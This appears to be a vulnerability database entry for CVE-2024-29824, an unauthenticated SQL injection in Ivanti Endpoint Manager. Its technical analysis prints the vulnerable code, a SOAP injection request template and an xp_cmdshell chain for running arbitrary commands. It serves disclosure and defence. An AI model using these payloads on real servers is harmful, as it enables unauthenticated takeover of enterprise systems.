Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

CVE-2024-29824

Disclosure Date: May 31, 2024
CVE-2024-29824
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.

Add Assessment

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Gives privileged accessUnauthenticatedVulnerable in default configuration
Technical Analysis

Ivanti Endpoint Manager (EPM) versions 2022 SU5 and prior are vulnerable to SQL injection and a patch has been released, as described in the official advisory and the related KB article. It is possible to leverage this vulnerability to achieve unauthenticated remote code execution.

The function RecordGoodApp() in AppMonitorAction.cs is responsible for handling reports of “good” applications.

159     private static void RecordGoodApp(
160       LanDeskDatabase database,
161       string[] tokens,
162       DateTime reportDate,
163       int computer_idn)
164     {
165       try
166       {
167         GoodApp goodApp = new GoodApp(tokens);
168         try
169         {
170           string sql1 = string.Format("Select ReportedGoodApps_Idn from ReportedGoodApps where md5 = '{0}'", (object) goodApp.md5);
171           DataRow row1 = database.ExecuteRow(sql1);

As can be seen in line 170, goodApp.md5 value is used to construct a SQL query without any sanitization. It happens that this value is user-supplied and this function can be reached through the EventHandler web service endpoint. The attack consists in sending a SOAP request to this endpoint, substituting the MD5 value with the malicious SQL command:

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <UpdateStatusEvents xmlns="http://tempuri.org/">
      <deviceID>string</deviceID>
      <actions>
        <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string">
          <status>GoodApp=1|md5=<SQL_COMMAND></status>
        </Action>
      </actions>
    </UpdateStatusEvents>
  </soap12:Body>
</soap12:Envelope>

To achieve remote code execution, the MS-SQL special command xp_cmdshell can be used this way:

;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC xp_cmdshell '<MALICIOUS COMMAND>'--

A Metasploit module is already available for this attack.

Note that this is an unauthenticated attack and it usually results in privileged access to the vulnerable system. Since Ivanti EPM is usually running as an NT Service user, this can be easily escalated to a NT AUTHORITY\SYSTEM privileged user.

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
None
Impact Score:
Unknown
Exploitability Score:
Unknown
Vector:
Unknown
Attack Vector (AV):
Unknown
Attack Complexity (AC):
Unknown
Privileges Required (PR):
Unknown
User Interaction (UI):
Unknown
Scope (S):
Unknown
Confidentiality (C):
Unknown
Integrity (I):
Unknown
Availability (A):
Unknown

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
EPM 2022 SU5
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • Ivanti

Products

  • EPM

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis